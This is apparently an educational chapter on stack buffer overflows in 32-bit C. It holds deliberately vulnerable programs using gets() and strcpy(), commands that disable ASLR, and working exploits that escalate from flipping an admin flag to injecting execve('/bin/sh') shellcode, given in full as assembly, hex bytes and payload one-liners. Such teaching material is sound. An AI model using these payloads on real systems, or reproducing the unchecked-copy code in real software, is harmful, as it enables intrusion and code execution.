Interacting with memory is part of every non-trivial program. To process data reliably, buffer sizes must be managed correctly. Writing more data than a buffer can hold results in a so-called buffer overflow: the memory region directly following the buffer is overwritten. This chapter explains this behavior and its effects in a detailed and practical way.
Modern compilers and operating systems include protection mechanisms that mitigate the effects of buffer overflows. For the sake of simplicity, these mechanisms are ignored for now and explained in later chapters. Each example includes compilation instructions in its first line that disable optimizations and protection mechanisms. All examples but the first one require that ASLR is disabled. The following command disables ASLR on a Linux system until it is enabled again or the machine is rebooted.
$ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
To enable ASLR again, use the command below.
$ echo 2 | sudo tee /proc/sys/kernel/randomize_va_space
Because disabling ASLR and running binaries without compiler protection mechanisms poses a security risk, it is recommended to apply this change and execute the vulnerable applications only in a virtual machine or another protected environment.
Keeping the theoretical concept from above in mind, a first practical example is presented next.
The code below asks the user for a name and prints whether the user is an administrator. A user is classified as an administrator if the entered name is "admin".
// gcc -g -O0 -m32 -std=c99 control.c
#include <stdio.h>
#include <string.h>
#include <stdbool.h>

struct User
{
    char name[8];
    bool is_admin;
};

int main()
{
    struct User user = {0};

    printf("Enter user name:\n");
    gets(user.name);

    if(strcmp(user.name, "admin") == 0)
        user.is_admin = true;

    if(user.is_admin)
        printf("Welcome back administrator!\n");
    else
        printf("Meh, hello %s. I was hoping for the administrator.\n", user.name);
    return 0;
}
Executing the code and entering "nufan" as the name results in the output shown below.
$ ./a.out
Enter user name:
nufan
Meh, hello nufan. I was hoping for the administrator.
Assuming basic knowledge of the C programming language, this behavior should come as no surprise. While the code is short and straightforward, it still contains a significant security vulnerability: user.name is a character array with a fixed size of 8 bytes, while the gets() function does not limit the length of the input. Next, we intentionally exceed the available capacity.
$ ./a.out
Enter user name:
123456789
Welcome back administrator!
According to the output, we are classified as an administrator although an incorrect name was entered. To retrace this behavior, we will look at the memory content after initialization and after each of the two inputs above. GDB is used to inspect the memory of the user variable. Additionally, the relevant memory region is visualized to aid understanding.
First, the state of the user variable is inspected directly after initialization. A breakpoint is set at line 16 to stop execution and print the user variable.
$ gdb -q a.out
Reading symbols from a.out...done.
(gdb) break 16
Breakpoint 1 at 0x647: file control.c, line 16.
(gdb) run
Starting program: /home/memory-corruption/a.out
Breakpoint 1, main () at control.c:16
16          printf("Enter user name:\n");
(gdb) p user
$1 = {name = "\000\000\000\000\000\000\000", is_admin = false}
Below you can see a memory-oriented visualization of the GDB output.
Just like before, we first enter the short name "nufan" and look at the resulting application state. To inspect the variable before the application exits, we set a breakpoint at the return statement in line 26.
(gdb) break 26
Breakpoint 2 at 0x565556b8: file control.c, line 26.
(gdb) continue
Continuing.
Enter user name:
nufan
Meh, hello nufan. I was hoping for the administrator.
Breakpoint 2, main () at control.c:26
26          return 0;
(gdb) p user
$2 = {name = "nufan\000\000", is_admin = false}
As expected, the memory content looks reasonable. We still have to look at the second, and much more interesting, case. Using "123456789" as the name exceeds the space of user.name and results in the following state.
$ gdb -q a.out
Reading symbols from a.out...done.
(gdb) break 26
Breakpoint 1 at 0x6b8: file control.c, line 26.
(gdb) run
Starting program: /home/memory-corruption/a.out
Enter user name:
123456789
Welcome back administrator!
Breakpoint 1, main () at control.c:26
26          return 0;
(gdb) p user
$1 = {name = "12345678", is_admin = 57}
The user.name buffer was filled up completely. Because even more data was entered, the '9' character (ASCII value 57) spilled over into the adjacent variable user.is_admin. Remember that in the C programming language every value other than 0 is considered to be true. Thus, the application classifies the user as an administrator.
Simply by overflowing an input buffer, the control flow of the application was redirected to an unintended execution branch. Although this example seems harmless, as the control flow differs only by a static output, the same vulnerability could equally overwrite crucial user data or allow an attacker to take full control of the application.
While the previous example already made use of the concept of a buffer overflow, it is rather limited as it is restricted to the use of a predefined control flow branch. With the next example we will take the exploitation one step further.
The example code copies the first command line argument to a variable located on the stack.
// gcc -g -O0 -m32 -no-pie -fno-pie -mpreferred-stack-boundary=2 function.c
#include <stdio.h>
#include <string.h>

void admin_stuff()
{
    printf("Welcome back administrator!\n");
}

int main(int argc, char *argv[])
{
    char buffer[8] = {0};

    if(argc != 2)
    {
        printf("A single argument is required.\n");
        return 1;
    }

    printf("Copying \"%s\"\n", argv[1]);
    strcpy(buffer, argv[1]);

    return 0;
}
Clearly, strcpy() copies an input of variable size into a buffer of fixed size. Note that the code contains a function admin_stuff() which is not part of the regular control flow. In contrast to the previous example, however, no local variable determining the control flow is located on the stack. This time we will not try to switch to a predefined execution branch; rather, we want to call admin_stuff(), which is an existing function within the binary but outside of any control flow. Building on the background knowledge about program execution and function calls from the previous chapter, we extend the view of the memory to include the stack frame.
The behavior of the application under normal circumstances is observed in GDB. Checking the memory directly after the initialization of the buffer, the top of the stack looks as follows.
$ gdb -q a.out
Reading symbols from a.out...done.
(gdb) set backtrace past-main
(gdb) break 14
Breakpoint 1 at 0x804848d: file function.c, line 14.
(gdb) break 23
Breakpoint 2 at 0x80484d2: file function.c, line 23.
(gdb) run ABCD
Starting program: /home/memory-corruption/a.out ABCD
Breakpoint 1, main (argc=2, argv=0xffffd444) at function.c:14
14          if(argc != 2)
(gdb) x/4wx $esp
0xffffd3a0:     0x00000000      0x00000000      0x00000000      0xf7e11286
We can identify the 8 bytes of the buffer variable, the 4 bytes of the saved EBP register and the 4-byte return address. Just before finishing execution, the second breakpoint causes the execution to stop.
(gdb) continue
Continuing.
Copying "ABCD"
Breakpoint 2, main (argc=2, argv=0xffffd444) at function.c:23
23          return 0;
(gdb) x/4wx $esp
0xffffd3a0:     0x44434241      0x00000000      0x00000000      0xf7e11286
Now the buffer is partially filled with the entered data. Observe the little-endian byte order of the values.
The goal of this exercise is to overwrite the return address 0xf7e11286 on the stack. Instead of returning to the previous function on the call stack, the control flow should be redirected to the admin_stuff() function. With the protection mechanisms ASLR and PIE disabled, the function has a static address within the binary and at runtime. nm is used to resolve the address of the symbol.
$ nm a.out | grep admin_stuff
08048466 T admin_stuff
This output shows that the admin_stuff() symbol is located at address 0x08048466 in the text segment of the binary.
In order to overwrite the return address, the 8-byte buffer and the 4-byte EBP copy need to be skipped first. "ABCDEFGHIJKL" is chosen to fill up this region. The payload is terminated by the address of admin_stuff() (0x08048466) in little-endian format.
$ gdb -q a.out
Reading symbols from a.out...done.
(gdb) break 23
Breakpoint 1 at 0x80484d2: file function.c, line 23.
(gdb) run $(echo -en "ABCDEFGHIJKL\x66\x84\x04\x08")
Starting program: /home/memory-corruption/a.out $(echo -en "ABCDEFGHIJKL\x66\x84\x04\x08")
Copying "ABCDEFGHIJKLf[?]"
Breakpoint 1, main (argc=0, argv=0xffffd434) at function.c:23
23          return 0;
(gdb) x/4wx $esp
0xffffd390:     0x44434241      0x48474645      0x4c4b4a49      0x08048466
(gdb) continue
Continuing.
Welcome back administrator!
Program received signal SIGSEGV, Segmentation fault.
0x00000000 in ?? ()
As the output shows, the admin_stuff() function is indeed executed. Due to the corrupted stack layout, the program crashes with a segmentation fault directly after the function has been executed. Remember that strcpy() writes a \0 byte to terminate the destination string, which was neglected in the illustrations. All addresses are constant over multiple executions, so the exploit also works outside GDB and with arbitrary fill values for the memory region before the return address.
$ ./a.out $(echo -en "000000000000\x66\x84\x04\x08")
Copying "000000000000f[?]"
Welcome back administrator!
Segmentation fault
Although functionally identical to the previous example, the vulnerable program of this section has a larger buffer but does not contain any predefined function we want to call. Additionally, the address of the buffer is printed upon execution.
// gcc -g -O0 -m32 -no-pie -fno-pie -mpreferred-stack-boundary=2 -z execstack execve.c
#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[])
{
    char buffer[32] = {0};

    if(argc != 2)
    {
        printf("A single argument is required.\n");
        return 1;
    }

    printf("Buffer: %p\n", buffer);
    strcpy(buffer, argv[1]);

    return 0;
}
The first step is to redirect execution to the data copied to the buffer. This is accomplished by filling up the 32 bytes of buffer plus the 4 bytes of the saved EBP register and overwriting the return address with the address of the buffer. We will first try this in GDB. It is important to note that addresses differ slightly when the application is executed within the debugger. Also note that command line arguments and environment variables are located on the stack and thus influence the address of the buffer array. Execute the application with arbitrary parameters of the intended length to find out the address of the buffer. In the following example the buffer is assumed to be located at 0xffffd358.
$ gdb -q ./a.out
Reading symbols from ./a.out...done.
(gdb) set disassembly-flavor intel
(gdb) disassemble main
Dump of assembler code for function main:
   0x08048466 <+0>:     push   ebp
   [...]
   0x080484d1 <+107>:   ret
End of assembler dump.
(gdb) break *0x080484d1
Breakpoint 1 at 0x080484d1: file execve.c, line 19.
(gdb) run $(echo -ne "12345678901234567890123456789012AAAA\x58\xd3\xff\xff")
Starting program: /home/memory-corruption/a.out $(echo -ne "12345678901234567890123456789012AAAA\x58\xd3\xff\xff")
Buffer: 0xffffd358
Breakpoint 1, 0x080484d1 in main (argc=0, argv=0xffffd414) at execve.c:19
20      }
(gdb) ni
0xffffd358 in ?? ()
As the last line of the output indicates, the execution was successfully redirected to the buffer. However, when inspecting the instructions at this location, no meaningful code can be identified:
(gdb) x/s $eip
0xffffd358:     "12345678901234567890123456789012AAAAX\323\377\377"
(gdb) x/5i $eip
=> 0xffffd358:  xor    DWORD PTR [edx],esi
   0xffffd35a:  xor    esi,DWORD PTR [esi*1+0x39383736]
   0xffffd361:  xor    BYTE PTR [ecx],dh
   0xffffd363:  xor    dh,BYTE PTR [ebx]
   0xffffd365:  xor    al,0x35
(gdb) continue
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0xffffd35a in ?? ()
The program crashes because of invalid memory accesses. This is understandable, as we only wanted to fill up the memory and did not yet care about mapping its content to instructions. What we need at this point is executable code in compiled form. Generating this code with a high-level programming language most likely introduces unintended instructions, so we fall back to assembly. More specifically, we will use the NASM assembler with Intel syntax to create our so-called shellcode.
Our final goal is to execute the shell /bin/sh via the execve system call. Calling execve has the following requirements when the interrupt is triggered:
- EAX contains an identifier for the system call and needs to have the value 11 (0x0b) for execve.
- EBX points to the (\0-terminated) name of the executable to be executed ("/bin/sh" in our case).
- ECX points to argv, i.e. an array that contains at least a pointer to the executable name (as referenced by EBX) and is terminated with a NULL pointer.
- EDX points to envp. As we do not need environment variables for the execution, we can simply set it to NULL.
First we need to correct the stack pointer. When returning from the main function, the stack frame is destroyed by increasing ESP. Our buffer is still there, but ESP now points to a higher memory address. As we want to push some values, we need to make sure that ESP points to a memory address lower than our buffer so that we do not overwrite our own code. Subtracting 0x30 (48) is a good guess, as we want to skip the return address (4 bytes), the saved EBP (4 bytes), buffer (32 bytes) and possibly some stack-alignment padding introduced by the compiler.
sub esp,0x30
Next, we need the \0-terminated string "/bin/sh" on the stack. As the stack grows from bottom (high memory addresses) to top (low memory addresses), we need to push the string in reverse order. Thus we start with the termination character \0. Keep in mind that we are using strcpy() to copy the data. It stops copying at a \0 character in the source string, so we are not allowed to have any 0 values in the compiled code. Luckily, there are several ways to calculate 0 without explicitly mentioning it. One common way is to xor a value with itself, which always results in 0 regardless of the value used.
xor eax,eax
We do not have to care about the size of this termination value, so we push the 4 byte register to the stack:
push eax
The remaining string is 7 characters long. To push it as two words of 4 bytes each, we need to add a fill character. "//bin/sh" is an equivalent 8-character alternative to "/bin/sh".
push 0x68732f6e ; hs/n
push 0x69622f2f ; ib//
Now that the string is set up correctly, the registers need to be filled accordingly. EBX needs to point to the name of the binary to execute. "//bin/sh" was pushed to the stack with the previous instructions. Hence, ESP is a pointer to this string and can be copied to EBX.
mov ebx,esp
Successful execution requires argv to be set correctly. This convention is also visible in C programs: argv is an array of pointers to strings (char *argv[]) and is terminated by a NULL value. argv[0] contains the executable name.
push eax ; argv[1] = NULL
push ebx ; argv[0] = "//bin/sh"
ECX needs to point to this array of pointers.
mov ecx,esp
Because no environment variables are needed, envp, which is passed via EDX, is set to NULL.
mov edx,eax
Lastly, the system call number is set to 11 (0x0b) and the interrupt is triggered.
mov al,0xb
int 0x80
We are done! Here is the full code:
; nasm -f elf32 execve.s
sub esp,0x30
xor eax,eax
push eax
push 0x68732f6e
push 0x69622f2f
mov ebx,esp
push eax
push ebx
mov ecx,esp
mov edx,eax
mov al,0xb
int 0x80
After translation with the nasm assembler, objdump is used to extract the executable code from the compiled object file.
$ objdump -d -M intel-mnemonic execve.o
execve.o:     file format elf32-i386
Disassembly of section .text:
00000000 <.text>:
   0:   83 ec 30                sub    esp,0x30
   3:   31 c0                   xor    eax,eax
   5:   50                      push   eax
   6:   68 6e 2f 73 68          push   0x68732f6e
   b:   68 2f 2f 62 69          push   0x69622f2f
  10:   89 e3                   mov    ebx,esp
  12:   50                      push   eax
  13:   53                      push   ebx
  14:   89 e1                   mov    ecx,esp
  16:   89 c2                   mov    edx,eax
  18:   b0 0b                   mov    al,0xb
  1a:   cd 80                   int    0x80
A little bit of Bash magic helps to extract the opcodes and bring them into a usable form.
$ for i in `objdump -d execve.o | sed -n '8,$p' | cut -f2`; do echo -En \\x$i; done
\x83\xec\x30\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80
The command calls objdump and uses sed to drop the first seven lines of the output. cut is applied to get the second column of each line, which holds the machine code bytes of the instruction. A loop over these bytes adds the required \x prefix to the output.
Count the number of bytes used for the payload to calculate the required padding.
$ for i in `objdump -d execve.o | sed -n '8,$p' | cut -f2`; do echo -en \\x$i; done | wc -c
28
To fill up 36 bytes (32-byte buffer + 4-byte EBP), a padding of 8 bytes is required. "12345678" was chosen in this case.
Feeding this exploit into the application results in a command prompt.
$ ./a.out $(echo -en "\x83\xec\x30\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x8012345678\xb8\xd3\xff\xff")
Buffer: 0xffffd3b8
Depending on the command line settings, one might not notice the difference between the spawned shell and a plain termination of the binary. Executing the same command under strace and filtering for execve calls proves that //bin/sh is executed from the vulnerable binary.
$ strace -e execve ./a.out $(echo -en "\x83\xec\x30\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x8012345678\xb8\xd3\xff\xff")
execve("./a.out", ["./a.out", "\203\35401\300Phn/shh//bi\211\343PS\211\341\211\302\260\v\315\2001234"...], 0x7fffffffe258 /* 47 vars */) = 0
strace: [ Process PID=10599 runs in 32 bit mode. ]
Buffer: 0xffffd3b8
execve("//bin/sh", ["//bin/sh"], NULL) = 0
strace: [ Process PID=10599 runs in 64 bit mode. ]
The overall memory state correlated with the assembly code is shown in the visualization below.
Finally we managed to execute arbitrary code by exploiting a buffer overflow vulnerability!
The examples above copied data passed as command line parameters. Another common data source is the standard input stream. As the exploitation via the standard input stream involves overcoming a common pitfall, it is observed with the following example.
// gcc -g -O0 -m32 -std=c99 -mpreferred-stack-boundary=2 -z execstack stdin.c
#include <stdio.h>

int main(int argc, char *argv[])
{
    char input[32] = {0};

    printf("Buffer: %p\n", input);
    gets(input);

    return 0;
}
Inspecting the code shows that the application prints the address of the buffer and then reads data from the standard input via the gets() function. The following explanation assumes that the buffer is located at the address 0xffffd324.
Using the shellcode from the previous section results in the following payload structure: the shellcode (28 bytes), the padding (12 bytes) and the return address (the address of the buffer, 0xffffd324).
A Perl command helps to generate the input for the exploit. Even if you are not familiar with Perl, make sure you are able to understand and generate inputs in a scripting language (e.g. Python or Bash are perfectly fine as well).
$ perl -e 'print "\x83\xec\x30\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80" . "aaaabbbbcccc" . "\x24\xd3\xff\xff" . "\n"' \
    | ./a.out
Buffer: 0xffffd324
$ echo $?
0
The program exits successfully but without providing us with a shell to execute commands. Let's use strace to inspect what is going on.
$ perl -e 'print "\x83\xec\x30\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80" . "aaaabbbbcccc" . "\x24\xd3\xff\xff" . "\n"' \
    | strace ./a.out
[...]
execve("//bin/sh", ["//bin/sh"], NULL) = 0
[...]
read(0, "", 8192) = 0
exit_group(0) = ?
The output shows that the shell was actually started, but closed immediately afterwards. Although confusing at the beginning, the explanation for this behavior is reasonable. After the shell is started up, it tries to read a command from the standard input. While the input stream was used for sending the payload to the application, we implicitly closed it afterwards. As the shell realizes there is no more input to read, it exits silently. To keep the shell open and enter commands manually, we need to keep the input stream open. One possibility to do so is the following.
$ cat <(perl -e 'print "\x83\xec\x30\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80" . "aaaabbbbcccc" . "\x24\xd3\xff\xff" . "\n"') - \
    | ./a.out
<() is the process substitution operator. Bash runs the command between the parentheses, in our case the Perl command, and replaces the expression with a file name from which cat can read the command's output. The - given as the second parameter tells cat to read from the standard input afterwards. cat therefore first writes the output of the Perl command to the pipe connected to a.out. Then, keeping the pipe open, it forwards everything entered on its own standard input through the same pipe.